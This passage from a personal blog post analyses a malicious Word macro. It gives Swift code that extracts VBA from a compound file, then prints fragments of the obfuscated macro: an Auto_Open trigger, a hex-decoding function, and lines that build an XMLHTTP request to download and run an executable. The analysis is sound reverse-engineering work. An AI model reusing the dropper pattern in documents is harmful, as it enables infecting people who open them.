Once we have a VBAModule
we can get hold of the macro source like this.
func getModuleSource(cf:CompoundFile, module:VBAModule) -> String?
{
let stream = cf.getStream(storage: ["Macros", "VBA"], name: module.streamName)
let data = stream?.data()
if data == nil
{
return nil
}
let offset = Int(module.offset)
let bytes = data!.bytes
let start = bytes + offset
let size = Int(stream!.size) - offset
let decompressor = VBADecompressor(bytes:start, nBytes:size)
if let decompressed = decompressor.decompress()
{
return
NSString(
bytes:
decompressed.bytes,
length:
decompressed.length,
encoding:
NSASCIIStringEncoding)
}
else
{
return nil
}
}
There is only one VBA module in this particular file.
It starts like this
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Auto_Open()
...
and ends with the canonical deobfuscation function.
...
Public Function 'seekritFunction'(ByVal sData As String) As String
Dim i As Long
For i = 1 To Len(sData) Step 2
'seekritFunction' = 'seekritFunction' & Chr$(Val("&H" & Mid$(sData, i, 2)))
Next i
End Function
In between there is a lot of stuff like this
...
GoTo lwaasqhrsst
Dim gqtnmnpnrcr As String
Open 'seekritFunction'("76627362776A7873756268") For Binary As #37555
Put #37555, , gqtnmnpnrcr
Close #37555
lwaasqhrsst:
Set kaakgrln = CreateObject('seekritFunction'("4D6963") + "ros" + "oft.XML" + "HTTP")
GoTo gerkcnuiiuy
Dim rqxnmbhnkoq As String
Open 'seekritFunction'("757A76737169746D6D6370") For Binary As #29343
Put #29343, , rqxnmbhnkoq
Close #29343
gerkcnuiiuy:
claofpvn = Environ('seekritFunction'("54454D50"))
GoTo vfvfbcuqpzg
Dim vnklmvuptaq As String
Open 'seekritFunction'("696F78686E716667726E6A") For Binary As #70201
Put #70201, , vnklmvuptaq
Close #70201
vfvfbcuqpzg:
kaakgrln.Open 'seekritFunction'("474554"), s8RX, False
...
which all looks very complicated until you realise that the first six lines of each block are a no-op.
There are approximately one hundred and fifty lines to start with of which about a half are ‘noise’.
What does it do ?
When the document is opened an executable (.exe) is downloaded from a hard-wired location and then run.
Thats it ? After all that ? ‘fraid so, a bit disappointing really isn’t it ? A spell-checker or something I expect. Very helpful of it really.
Still the Swift stuff was fun and the compound file stuff was ‘interesting’ !
Copyright (c) 2014 By Simon Lewis. All Rights Reserved.
Unauthorized use and/or duplication of this material without express and written permission from this blog’s author and owner Simon Lewis is strictly prohibited.
Excerpts and links may be used, provided that full and clear credit is given to Simon Lewis and justanapplication.wordpress.com with appropriate and specific direction to the original content.